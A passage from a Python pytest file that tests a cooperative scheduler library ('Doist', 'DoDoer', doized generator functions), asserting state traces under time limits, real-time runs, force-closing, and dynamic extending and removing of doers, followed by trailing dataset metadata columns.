                            State(tyme=0.5, context='recur', feed=0.5, count=3),
                            State(tyme=0.75, context='recur', feed=0.75, count=4),
                            State(tyme=0.75, context='exit', feed=None, count=5)]
    assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.5, context='recur', feed=0.5, count=2),
                            State(tyme=1.0, context='recur', feed=1.0, count=3)]

    # Sixth recur: doer1 not due (tock 0.5) so no new state.
    doist.recur()
    assert doist.tyme == 1.50  # on next cycle
    assert len(doist.deeds) == 1
    assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.25, context='recur', feed=0.25, count=2),
                            State(tyme=0.5, context='recur', feed=0.5, count=3),
                            State(tyme=0.75, context='recur', feed=0.75, count=4),
                            State(tyme=0.75, context='exit', feed=None, count=5)]
    assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.5, context='recur', feed=0.5, count=2),
                            State(tyme=1.0, context='recur', feed=1.0, count=3)]

    # Seventh recur: doer1 completes; no deeds remain.
    doist.recur()
    assert doist.tyme == 1.75  # on next cycle
    assert len(doist.deeds) == 0
    assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.25, context='recur', feed=0.25, count=2),
                            State(tyme=0.5, context='recur', feed=0.5, count=3),
                            State(tyme=0.75, context='recur', feed=0.75, count=4),
                            State(tyme=0.75, context='exit', feed=None, count=5)]
    assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.5, context='recur', feed=0.5, count=2),
                            State(tyme=1.0, context='recur', feed=1.0, count=3),
                            State(tyme=1.5, context='recur', feed=1.5, count=4),
                            State(tyme=1.5, context='exit', feed=None, count=5)]
    assert doer1.done == True
    """End Test """
def test_doist_doers():
    """
    Test doist.do with .close of deeds
    """
    tock = 0.03125
    doist = doing.Doist(tock=tock)
    assert doist.tyme == 0.0  # on next cycle
    assert doist.tock == tock == 0.03125
    assert doist.real == False
    assert doist.limit == None
    assert doist.doers == []

    # doer0 runs every cycle; doer1 every other cycle.
    doer0 = doing.ExDoer(tock=tock, tymth=doist.tymen())
    doer1 = doing.ExDoer(tock=tock*2, tymth=doist.tymen())
    assert doer0.tock == tock
    assert doer1.tock == tock * 2
    doers = [doer0, doer1]
    for doer in doers:
        assert doer.states == []
        assert doer.count == None
        assert doer.done == None

    # Scenario 1: run with an explicit limit; doer0 finishes cleanly,
    # doer1 is force-closed at the limit (done == False).
    ticks = 4
    limit = tock * ticks
    doist.do(doers=doers, limit=limit)
    assert doist.tyme == limit == 0.125
    assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.03125, context='recur', feed=0.03125, count=2),
                            State(tyme=0.0625, context='recur', feed=0.0625, count=3),
                            State(tyme=0.09375, context='recur', feed=0.09375, count=4),
                            State(tyme=0.09375, context='exit', feed=None, count=5)]
    assert doer0.done == True
    assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.0625, context='recur', feed=0.0625, count=2),
                            State(tyme=0.125, context='close', feed=None, count=3),
                            State(tyme=0.125, context='exit', feed=None, count=4)]
    assert doer1.done == False

    # Scenario 2: same run but real-time doist with limit set at init.
    doist = doing.Doist(tock=tock, real=True, limit=limit)
    assert doist.tyme == 0.0  # on next cycle
    assert doist.tock == tock == 0.03125
    assert doist.real == True
    assert doist.limit == limit == 0.125
    assert doist.doers == []
    for doer in doers:
        doer.states = []
        assert doer.states == []
    doist.do(doers=doers)
    assert doist.tyme == limit == 0.125
    assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.03125, context='recur', feed=0.03125, count=2),
                            State(tyme=0.0625, context='recur', feed=0.0625, count=3),
                            State(tyme=0.09375, context='recur', feed=0.09375, count=4),
                            State(tyme=0.09375, context='exit', feed=None, count=5)]
    assert doer0.done == True
    assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.0625, context='recur', feed=0.0625, count=2),
                            State(tyme=0.125, context='close', feed=None, count=3),
                            State(tyme=0.125, context='exit', feed=None, count=4)]
    assert doer1.done == False

    # Scenario 3: doers passed to Doist init instead of to .do().
    doist = doing.Doist(tock=tock, real=True, limit=limit, doers=doers)
    assert doist.tyme == 0.0  # on next cycle
    assert doist.tock == tock == 0.03125
    assert doist.real == True
    assert doist.limit == limit == 0.125
    assert doist.doers == doers
    for doer in doers:
        doer.states = []
        assert doer.states == []
    doist.do()
    assert doist.tyme == limit == 0.125
    assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.03125, context='recur', feed=0.03125, count=2),
                            State(tyme=0.0625, context='recur', feed=0.0625, count=3),
                            State(tyme=0.09375, context='recur', feed=0.09375, count=4),
                            State(tyme=0.09375, context='exit', feed=None, count=5)]
    assert doer0.done == True
    assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.0625, context='recur', feed=0.0625, count=2),
                            State(tyme=0.125, context='close', feed=None, count=3),
                            State(tyme=0.125, context='exit', feed=None, count=4)]
    assert doer1.done == False

    # Scenario 4: run ASAP (doer tock 0.0) so both doers run every cycle
    # and both complete cleanly before the limit.
    doist = doing.Doist(tock=tock, real=False, limit=limit)
    assert doist.tyme == 0.0  # on next cycle
    assert doist.tock == tock == 0.03125
    assert doist.real == False
    assert doist.limit == limit == 0.125
    assert doist.doers == []
    for doer in doers:
        doer.states = []
        assert doer.states == []
        doer.tock = 0.0  # run asap
        assert doer.tock == 0.0
    doist.do(doers=doers)
    assert doist.tyme == limit
    assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.03125, context='recur', feed=0.03125, count=2),
                            State(tyme=0.0625, context='recur', feed=0.0625, count=3),
                            State(tyme=0.09375, context='recur', feed=0.09375, count=4),
                            State(tyme=0.09375, context='exit', feed=None, count=5)]
    assert doer0.done == doer1.done == True
    assert doer1.states == doer0.states

    # Scenario 5: ASAP in real time; identical traces expected.
    doist = doing.Doist(tock=tock, real=True, limit=limit)
    assert doist.tyme == 0.0  # on next cycle
    assert doist.tock == tock == 0.03125
    assert doist.real == True
    assert doist.limit == limit == 0.125
    assert doist.doers == []
    for doer in doers:
        doer.states = []
        assert doer.states == []
        doer.tock = 0.0  # run asap
        assert doer.tock == 0.0
    doist.do(doers=doers)
    assert doist.tyme == limit
    assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.03125, context='recur', feed=0.03125, count=2),
                            State(tyme=0.0625, context='recur', feed=0.0625, count=3),
                            State(tyme=0.09375, context='recur', feed=0.09375, count=4),
                            State(tyme=0.09375, context='exit', feed=None, count=5)]
    assert doer0.done == doer1.done == True
    assert doer1.states == doer0.states

    # Scenario 6: limit too low to finish; both doers force-closed.
    ticks = 2
    limit = tock * ticks
    doist = doing.Doist(tock=tock, real=False, limit=limit)
    assert doist.tyme == 0.0  # on next cycle
    assert doist.tock == tock == 0.03125
    assert doist.real == False
    assert doist.limit == limit == 0.0625
    assert doist.doers == []
    for doer in doers:
        doer.states = []
        assert doer.states == []
        doer.tock = 0.0  # run asap
        assert doer.tock == 0.0
    doist.do(doers=doers)
    assert doist.tyme == limit
    assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.03125, context='recur', feed=0.03125, count=2),
                            State(tyme=0.0625, context='close', feed=None, count=3),
                            State(tyme=0.0625, context='exit', feed=None, count=4)]
    assert doer0.done == doer1.done == False
    assert doer1.states == doer0.states

    # Scenario 7: low limit force close, real time.
    doist = doing.Doist(tock=tock, real=True, limit=limit)
    assert doist.tyme == 0.0  # on next cycle
    assert doist.tock == tock == 0.03125
    assert doist.real == True
    assert doist.limit == limit == 0.0625
    assert doist.doers == []
    for doer in doers:
        doer.states = []
        assert doer.states == []
        doer.tock = 0.0  # run asap
        assert doer.tock == 0.0
    doist.do(doers=doers)
    assert doist.tyme == limit
    assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.03125, context='recur', feed=0.03125, count=2),
                            State(tyme=0.0625, context='close', feed=None, count=3),
                            State(tyme=0.0625, context='exit', feed=None, count=4)]
    assert doer0.done == doer1.done == False
    assert doer1.states == doer0.states
    """End Test """
def test_extend_remove_doers():
    """
    Test Doist but dynamically extend and remove doers
    """
    tock = 1.0
    limit = 5.0

    # create some TryDoers for doers; each stops after its 'stop' count
    doer0 = TryDoer(stop=1)
    doer1 = TryDoer(stop=2)
    doer2 = TryDoer(stop=3)
    doers = [doer0, doer1, doer2]

    doist = doing.Doist(tock=tock, limit=limit, doers=list(doers))  # make copy
    assert doist.tock == tock == 1.0
    assert doist.limit == limit == 5.0
    assert doist.done is None
    assert doist.doers == doers
    assert not doist.deeds

    # Run to a lower limit: only doer0 (stop=1) completes.
    doist.do(limit=2)
    assert doist.tyme == 2.0
    assert not doist.done  # still remaining deeds that did not complete
    assert doer0.done
    assert not doer1.done
    assert not doer2.done
    assert not doist.deeds
    assert doist.doers == doers

    # redo from tyme 0: same outcome
    doist.do(tyme=0, limit=2)
    assert doist.tyme == 2.0
    assert not doist.done  # deeds that did not complete
    assert doer0.done
    assert not doer1.done
    assert not doer2.done
    assert not doist.deeds
    assert doist.doers == doers

    # redo again
    doist.do(tyme=0, limit=2)
    assert doist.tyme == 2.0
    assert not doist.done  # remaining deeds that did not complete
    assert doer0.done
    assert not doer1.done
    assert not doer2.done
    assert not doist.deeds
    assert doist.doers == doers

    # Test extend and remove Doers
    # Now manually restart and run manually but do not reach limit so we can
    # extend and remove below
    doist.done = False
    assert not doist.done
    doist.tyme = 0.0
    assert doist.tyme == 0.0
    assert not doist.deeds
    assert doist.doers == doers
    doist.enter()
    assert len(doist.deeds) == 3
    doist.recur()
    doist.recur()
    assert doist.tyme == 2.0
    assert not doist.done
    assert doer0.done
    assert not doer1.done
    assert not doer2.done
    assert len(doist.deeds) == 2  # deeds still there

    # test extend Doers: extending while running schedules new deeds
    doer3 = TryDoer(stop=1)
    doer4 = TryDoer(stop=2)
    moredoers = [doer3, doer4]
    doist.extend(doers=list(moredoers))  # make copy
    assert doist.doers == doers + moredoers
    assert len(doist.doers) == 5
    assert len(doist.deeds) == 4
    # NOTE: the original also built an unused `indices` list from the deeds
    # here; that dead local has been removed.
    doers = [doer for dog, retyme, doer in doist.deeds]
    assert doers == [doer1, doer2, doer3, doer4]
    doist.recur()
    doist.recur()
    assert doist.tyme == 4.0
    assert not doist.done  # doist not done
    assert doer0.done
    assert doer1.done
    assert doer2.done
    assert doer3.done
    assert not doer4.done
    assert len(doist.deeds) == 1  # deeds still there

    # exit() force-closes the remaining deed so doer4 stays not done
    doist.exit()
    assert doist.done == False  # forced close so not done
    assert doer0.done
    assert doer1.done
    assert doer2.done
    assert doer3.done
    assert not doer4.done  # forced close so not done
    assert not doist.deeds
    """ Done Test"""
def test_doist_remove():
    """
    Test Doist.remove of doers
    """
    tock = 1.0
    limit = 5.0

    # start over with full set to test remove
    doer0 = TryDoer(stop=1)
    doer1 = TryDoer(stop=2)
    doer2 = TryDoer(stop=3)
    doer3 = TryDoer(stop=2)
    doer4 = TryDoer(stop=3)
    doers = [doer0, doer1, doer2, doer3, doer4]

    # always=True keeps the doist running even when all deeds complete
    doist = doing.Doist(tock=tock, doers=list(doers), always=True)
    assert doist.tock == tock == 1.0
    assert doist.tyme == 0.0
    assert doist.doers == doers
    for doer in doist.doers:
        assert doer.done == None
    assert doist.done == None
    assert not doist.deeds
    doist.enter()
    assert doist.done == None  # did not call .do so stays None not False
    doist.recur()
    doist.recur()
    assert doist.tyme == 2.0
    assert not doist.done  # doist not done
    assert doer0.done
    assert not doer1.done
    assert not doer2.done
    assert not doer3.done
    assert not doer4.done
    assert len(doist.deeds) == 4  # deeds still there
    doers = [doer for dog, retyme, doer in doist.deeds]
    assert doers == [doer1, doer2, doer3, doer4]  # doer0 is removed
    for dog, retyme, doer in doist.deeds:
        assert not doer.done

    # remove three doers; their deeds are force-exited (done stays falsy)
    doist.remove(doers=[doer0, doer1, doer3])
    assert doist.doers == [doer2, doer4]
    assert len(doist.deeds) == 2
    doers = [doer for dog, retyme, doer in doist.deeds]
    assert doers == [doer2, doer4]  # others are removed
    for dog, retyme, doer in doist.deeds:
        assert not doer.done
    assert not doer1.done  # forced exit
    assert not doer3.done  # forced exit

    # let the remaining two doers run to completion
    doist.recur()
    doist.recur()
    assert doist.tyme == 4.0
    assert doist.done == None  # never called .do
    assert len(doist.deeds) == 0  # all done
    assert len(doist.doers) == 2  # not removed but completed
    for doer in doist.doers:
        assert doer.done
    assert doer0.done  # already clean done before remove
    assert not doer1.done  # forced exit upon remove before done
    assert doer2.done  # clean done
    assert not doer3.done  # forced exit upon remove before done
    assert doer4.done  # clean done
    doist.recur()
    doist.recur()  # does not complete because always == True
    """Done Test"""
def test_doist_remove_by_own_doer():
    """
    Test .remove method of Doist called by a doer of Doist
    """
    tock = 1.0
    limit = 5.0

    # create doist first so can inject it into removeDo
    doist = doing.Doist(tock=tock, limit=limit)

    # create doized function that removes doers
    @doing.doize(tock=0.0, doist=doist)
    def removeDo(tymth=None, tock=0.0, doist=None, **opts):
        """
        Returns generator function (doer dog) to process
        to remove all doers of doist but itself

        Parameters:
            tymth is injected function wrapper closure returned by .tymen() of
                Tymist instance (e.g. Doist/DoDoer). Calling tymth() returns
                associated Tymist .tyme.
            tock is injected initial tock value from doer.tock
            opts is dict of injected optional additional parameters from doer.opts

        Injected attributes by doize decorator as parameters to this method:
            gf.tock = tock  # default tock attribute for doer
            gf.opts = {}  # default opts for doer

        Usage:
            add to doers list
        """
        rdoers = []
        yield  # enter context also makes generator method
        # recur context: collect every doer except self, then remove them
        for doer in doist.doers:
            # doize decorated function satisfies '==' but not 'is'
            if doer != removeDo:  # must be != vs. is not
                rdoers.append(doer)
        doist.remove(rdoers)
        yield  # extra yield for testing so does a couple of passes after removed
        yield  # extra yield for testing so does a couple of passes after removed
        return True  # once removed then return to remove itself as doer

    # create other doers to remove
    doer0 = TryDoer(stop=1)
    doer1 = TryDoer(stop=2)
    doer2 = TryDoer(stop=3)
    doer3 = TryDoer(stop=2)
    doer4 = TryDoer(stop=3)
    doers = [doer0, doer1, doer2, doer3, doer4, removeDo]

    doist.doers = list(doers)  # make copy
    assert doist.tock == tock == 1.0
    assert doist.tyme == 0.0
    assert doist.limit == limit == 5.0
    assert doist.doers == doers
    assert removeDo in doist.doers
    for doer in doist.doers:
        assert doer.done == None
    assert doist.done == None
    assert not doist.deeds
    doist.enter()
    assert not doist.done

    doist.recur()  # should run removeDo and remove all but itself
    assert doist.tyme == 1.0
    assert doist.deeds
    assert not doist.done  # doist not done
    assert len(doist.doers) == 1
    assert removeDo in doist.doers
    # force exited so not done
    assert not doer0.done
    assert not doer1.done
    assert not doer2.done
    assert not doer3.done
    assert not doer4.done

    doist.recur()  # removeDo's first extra yield
    assert doist.tyme == 2.0
    assert doist.deeds
    assert not doist.done  # dodoer not done
    assert doist.deeds
    assert len(doist.doers) == 1
    assert removeDo in doist.doers

    doist.recur()  # removeDo returns True; its deed is dropped
    assert doist.tyme == 3.0
    assert not doist.deeds
    assert not doist.done
    assert len(doist.doers) == 1
    assert removeDo in doist.doers
    assert removeDo.done
    """Done Test"""
def test_doist_remove_own_doer():
    """
    Test .remove method of Doist called by a doer of Doist that removes all
    doers including itself.
    """
    tock = 1.0
    limit = 5.0

    # create doist first so can inject it into removeDo
    doist = doing.Doist(tock=tock, limit=limit)

    # create doized function that removes doers
    @doing.doize(tock=0.0, doist=doist)
    def removeDo(tymth=None, tock=0.0, doist=None, **opts):
        """
        Returns generator function (doer dog) to process
        to remove all doers of doist but itself

        Parameters:
            tymth is injected function wrapper closure returned by .tymen() of
                Tymist instance (e.g. Doist/DoDoer). Calling tymth() returns
                associated Tymist .tyme.
            tock is injected initial tock value from doer.tock
            opts is dict of injected optional additional parameters from doer.opts

        Injected attributes by doize decorator as parameters to this method:
            gf.tock = tock  # default tock attribute for doer
            gf.opts = {}  # default opts for doer

        Usage:
            add to doers list
        """
        yield  # enter context also makes generator method
        # recur context
        doist.remove(list(doist.doers))  # attempt to remove all doers including itself
        yield  # extra yield for testing so does a couple of passes after removed
        yield  # extra yield for testing so does a couple of passes after removed
        return True  # once removed then return to remove itself as doer

    # create other doers to remove
    doer0 = TryDoer(stop=1)
    doer1 = TryDoer(stop=2)
    doer2 = TryDoer(stop=3)
    doer3 = TryDoer(stop=2)
    doer4 = TryDoer(stop=3)
    doers = [doer0, doer1, doer2, doer3, doer4, removeDo]

    doist.doers = list(doers)  # make copy
    assert doist.tock == tock == 1.0
    assert doist.tyme == 0.0
    assert doist.limit == limit == 5.0
    assert doist.doers == doers
    assert removeDo in doist.doers
    for doer in doist.doers:
        assert doer.done == None
    assert doist.done == None
    assert not doist.deeds
    doist.enter()
    assert not doist.done

    doist.recur()  # should run removeDo and remove all but itself
    assert doist.tyme == 1.0
    assert doist.deeds  # doer removed by not deed.
    assert not doist.done  # doist not done
    assert not doist.doers
    assert not removeDo in doist.doers
    # force exited so not done
    assert not doer0.done
    assert not doer1.done
    assert not doer2.done
    assert not doer3.done
    assert not doer4.done
    assert not removeDo.done

    doist.recur()  # removeDo's deed survives even though doer was removed
    assert doist.tyme == 2.0
    assert doist.deeds
    assert not doist.done  # dodoer not done
    assert doist.deeds
    assert not doist.doers

    doist.recur()  # removeDo returns True and its deed completes
    assert doist.tyme == 3.0
    assert not doist.deeds
    assert not doist.done
    assert removeDo.done  # finished on it own
    """Done Test"""
def test_nested_doers():
    """
    Test Doist running nested DoDoers and Doers
    """
    tock = 0.03125
    doist = doing.Doist(tock=tock)
    assert doist.tyme == 0.0  # on next cycle
    assert doist.tock == tock == 0.03125
    assert doist.real == False
    assert doist.limit == None
    assert doist.doers == []

    # First nested group: doer0 runs asap, doer1 every other cycle.
    doer0 = doing.ExDoer(tock=0.0, tymth=doist.tymen())
    doer1 = doing.ExDoer(tock=tock*2, tymth=doist.tymen())
    assert doer0.tock == 0.0
    assert doer1.tock == tock * 2
    aDoers = [doer0, doer1]
    for doer in aDoers:
        assert doer.states == []
        assert doer.count == None
        assert doer.done == None

    aDoer = doing.DoDoer(tock=0.0, tymth=doist.tymen(), doers=aDoers)
    assert aDoer.doers == aDoers
    assert aDoer.done == None

    # Second nested group under a slower DoDoer (tock*2).
    doer2 = doing.ExDoer(tock=0.0, tymth=doist.tymen())
    doer3 = doing.ExDoer(tock=tock*4, tymth=doist.tymen())
    assert doer2.tock == 0.0
    assert doer3.tock == tock * 4
    bDoers = [doer2, doer3]
    for doer in bDoers:
        assert doer.states == []
        assert doer.count == None
        assert doer.done == None

    bDoer = doing.DoDoer(tock=tock*2, tymth=doist.tymen(), doers=bDoers)
    assert bDoer.doers == bDoers
    assert bDoer.done == None

    doers = [aDoer, bDoer]
    ticks = 8
    limit = tock * ticks
    doist.do(doers=doers, limit=limit)  # run em all
    assert doist.tyme == limit == 0.25
    assert aDoer.done == True
    assert bDoer.done == False

    assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.03125, context='recur', feed=0.03125, count=2),
                            State(tyme=0.0625, context='recur', feed=0.0625, count=3),
                            State(tyme=0.09375, context='recur', feed=0.09375, count=4),
                            State(tyme=0.09375, context='exit', feed=None, count=5)]
    # BUG FIX: originally asserted doer1.done here, duplicating the check
    # after doer1.states below and leaving doer0.done untested. Since
    # aDoer.done == True above, doer0 must have completed cleanly.
    assert doer0.done == True
    assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.0625, context='recur', feed=0.0625, count=2),
                            State(tyme=0.125, context='recur', feed=0.125, count=3),
                            State(tyme=0.1875, context='recur', feed=0.1875, count=4),
                            State(tyme=0.1875, context='exit', feed=None, count=5)]
    assert doer1.done == True
    assert doer2.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.0625, context='recur', feed=0.0625, count=2),
                            State(tyme=0.125, context='recur', feed=0.125, count=3),
                            State(tyme=0.1875, context='recur', feed=0.1875, count=4),
                            State(tyme=0.1875, context='exit', feed=None, count=5)]
    assert doer2.done == True
    assert doer3.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                            State(tyme=0.0, context='recur', feed=0.0, count=1),
                            State(tyme=0.125, context='recur', feed=0.125, count=2),
                            State(tyme=0.25, context='close', feed=None, count=3),
                            State(tyme=0.25, context='exit', feed=None, count=4)]
    assert doer3.done == False
    """End Test """
def test_doist_dos():
    """
    Test doist.do with dos generator functions not generator methods

    Runs three doified generator-function doers under a Doist scheduler and
    checks the exact (tyme, context, feed, count) State trace each records in
    its .opts['states'] list, across four scenarios:
      1. virtual (non-real) time with an explicit limit,
      2. real time with the same limit,
      3. virtual time with a low limit that force-closes the doers,
      4. real time with the same low limit.
    """
    # tock is the base scheduler period; all expected tymes below are
    # multiples of this value.
    tock = 0.03125
    doist = doing.Doist(tock=tock)
    assert doist.tyme == 0.0  # on next cycle
    assert doist.tock == tock == 0.03125
    assert doist.real == False
    assert doist.limit == None
    assert doist.doers == []

    # doer0: doified copy with its own opts dict; starts with states=None
    # and is given a fresh list to record into.
    doer0 = doing.doify(doing.doifyExDo, name='gf0', tock=tock, states=None)
    assert inspect.isgeneratorfunction(doer0)
    assert doer0.opts["states"] == None
    doer0.opts['states'] = []
    assert doer0.tock == tock
    assert doer0.done == None

    # doer1: doified with double tock and initially empty opts.
    doer1 = doing.doify(doing.doifyExDo, name='gf1', tock=tock*2)
    assert inspect.isgeneratorfunction(doer1)
    assert not doer1.opts
    doer1.opts['states'] = []
    assert doer1.tock == tock * 2
    assert doer1.done == None
    # doify must produce distinct function copies, not share one object.
    assert doer0 is not doer1

    # doer2: the module-level pre-doized generator function (shared object,
    # so its tock/opts are mutated in place here).
    doer2 = doing.doizeExDo
    assert inspect.isgeneratorfunction(doer2)
    assert doer2.opts["states"] == None
    doer2.opts["states"] = []
    doer2.tock = tock * 2
    assert doer2.done == None

    doers = [doer0, doer1, doer2]
    for doer in doers:
        assert doer.opts['states'] == []

    # Scenario 1: virtual time, limit = 4 ticks.  doer0 (tock) gets 4 recurs
    # and finishes; doer1/doer2 (tock*2) are force-closed at the limit.
    ticks = 4
    limit = tock * ticks
    doist.do(doers=doers, limit=limit)
    assert doist.tyme == limit == 0.125
    assert doer0.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                                    State(tyme=0.0, context='recur', feed=0.0, count=1),
                                    State(tyme=0.03125, context='recur', feed=0.03125, count=2),
                                    State(tyme=0.0625, context='recur', feed=0.0625, count=3),
                                    State(tyme=0.09375, context='recur', feed=0.09375, count=4),
                                    State(tyme=0.09375, context='exit', feed=None, count=5)]
    assert doer0.done == True
    assert doer1.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                                    State(tyme=0.0, context='recur', feed=0.0, count=1),
                                    State(tyme=0.0625, context='recur', feed=0.0625, count=2),
                                    State(tyme=0.125, context='close', feed=None, count=3),
                                    State(tyme=0.125, context='exit', feed=None, count=4)]
    assert doer1.done == False
    assert doer2.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                                    State(tyme=0.0, context='recur', feed=0.0, count=1),
                                    State(tyme=0.0625, context='recur', feed=0.0625, count=2),
                                    State(tyme=0.125, context='close', feed=None, count=3),
                                    State(tyme=0.125, context='exit', feed=None, count=4)]
    assert doer2.done == False

    # repeat but real time
    # Scenario 2: real-time scheduling must yield the same State traces.
    doist = doing.Doist(tock=tock, real=True, limit=limit)
    assert doist.tyme == 0.0  # on next cycle
    assert doist.tock == tock == 0.03125
    assert doist.real == True
    assert doist.limit == limit == 0.125
    assert doist.doers == []
    for doer in doers:
        doer.opts['states'] = []  # reset recorded trace between scenarios
        assert doer.opts['states'] == []
        doer.done = None
    doist.do(doers=doers)
    assert doist.tyme == limit == 0.125
    assert doer0.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                                    State(tyme=0.0, context='recur', feed=0.0, count=1),
                                    State(tyme=0.03125, context='recur', feed=0.03125, count=2),
                                    State(tyme=0.0625, context='recur', feed=0.0625, count=3),
                                    State(tyme=0.09375, context='recur', feed=0.09375, count=4),
                                    State(tyme=0.09375, context='exit', feed=None, count=5)]
    assert doer1.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                                    State(tyme=0.0, context='recur', feed=0.0, count=1),
                                    State(tyme=0.0625, context='recur', feed=0.0625, count=2),
                                    State(tyme=0.125, context='close', feed=None, count=3),
                                    State(tyme=0.125, context='exit', feed=None, count=4)]
    assert doer2.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                                    State(tyme=0.0, context='recur', feed=0.0, count=1),
                                    State(tyme=0.0625, context='recur', feed=0.0625, count=2),
                                    State(tyme=0.125, context='close', feed=None, count=3),
                                    State(tyme=0.125, context='exit', feed=None, count=4)]

    # Low limit force close
    # Scenario 3: virtual time, limit = 2 ticks; every doer (tock forced to
    # 0.0 so each runs every cycle) is closed at the limit before finishing.
    ticks = 2
    limit = tock * ticks
    doist = doing.Doist(tock=tock, real=False, limit=limit)
    assert doist.tyme == 0.0  # on next cycle
    assert doist.tock == tock == 0.03125
    assert doist.real == False
    assert doist.limit == limit == 0.0625
    assert doist.doers == []
    for doer in doers:
        doer.opts['states'] = []
        assert doer.opts['states'] == []
        doer.tock = 0.0  # run asap
    doist.do(doers=doers)
    assert doist.tyme == limit
    assert doer0.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                                    State(tyme=0.0, context='recur', feed=0.0, count=1),
                                    State(tyme=0.03125, context='recur', feed=0.03125, count=2),
                                    State(tyme=0.0625, context='close', feed=None, count=3),
                                    State(tyme=0.0625, context='exit', feed=None, count=4)]
    # with identical tocks all three doers record identical traces
    assert doer0.opts["states"] == doer1.opts["states"] == doer2.opts["states"]

    # low limit force close real time
    # Scenario 4: same low-limit force close, but under real-time scheduling.
    doist = doing.Doist(tock=tock, real=True, limit=limit)
    assert doist.tyme == 0.0  # on next cycle
    assert doist.tock == tock == 0.03125
    assert doist.real == True
    assert doist.limit == limit == 0.0625
    assert doist.doers == []
    for doer in doers:
        doer.opts['states'] = []
        assert doer.opts['states'] == []
        doer.tock = 0.0  # run asap
    doist.do(doers=doers)
    assert doist.tyme == limit
    assert doer0.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
                                    State(tyme=0.0, context='recur', feed=0.0, count=1),
                                    State(tyme=0.03125, context='recur', feed=0.03125, count=2),
                                    State(tyme=0.0625, context='close', feed=None, count=3),
                                    State(tyme=0.0625, context='exit', feed=None, count=4)]
    assert doer0.opts["states"] == doer1.opts["states"] == doer2.opts["states"]
    """End Test """
if __name__ == "__main__":
    # NOTE(review): when run as a script this module executes only
    # test_doist_remove_own_doer (defined elsewhere in this file); the other
    # tests, including test_doist_dos above, are reached only via pytest —
    # confirm this narrowing is intentional.
    test_doist_remove_own_doer()
| 39.765021 | 88 | 0.571328 | 5,153 | 37,061 | 4.102076 | 0.04541 | 0.046599 | 0.081843 | 0.078815 | 0.879932 | 0.85377 | 0.83849 | 0.827988 | 0.814126 | 0.797426 | 0 | 0.070318 | 0.29357 | 37,061 | 931 | 89 | 39.807734 | 0.737061 | 0.112112 | 0 | 0.831006 | 0 | 0 | 0.031999 | 0 | 0 | 0 | 0 | 0 | 0.505587 | 1 | 0.015363 | false | 0 | 0.006983 | 0 | 0.02514 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6a73ce4752df31ef74d5c5528dd8b4bc01b237df | 39,042 | py | Python | skidl/libs/rfcom_sklib.py | arjenroodselaar/skidl | 0bf801bd3b74e6ef94bd9aa1b68eef756b568276 | [
"MIT"
] | 700 | 2016-08-16T21:12:50.000Z | 2021-10-10T02:15:18.000Z | skidl/libs/rfcom_sklib.py | 0dvictor/skidl | 458709a10b28a864d25ae2c2b44c6103d4ddb291 | [
"MIT"
] | 118 | 2016-08-16T20:51:05.000Z | 2021-10-10T08:07:18.000Z | skidl/libs/rfcom_sklib.py | 0dvictor/skidl | 458709a10b28a864d25ae2c2b44c6103d4ddb291 | [
"MIT"
] | 94 | 2016-08-25T14:02:28.000Z | 2021-09-12T05:17:08.000Z | from skidl import SKIDL, TEMPLATE, Part, Pin, SchLib
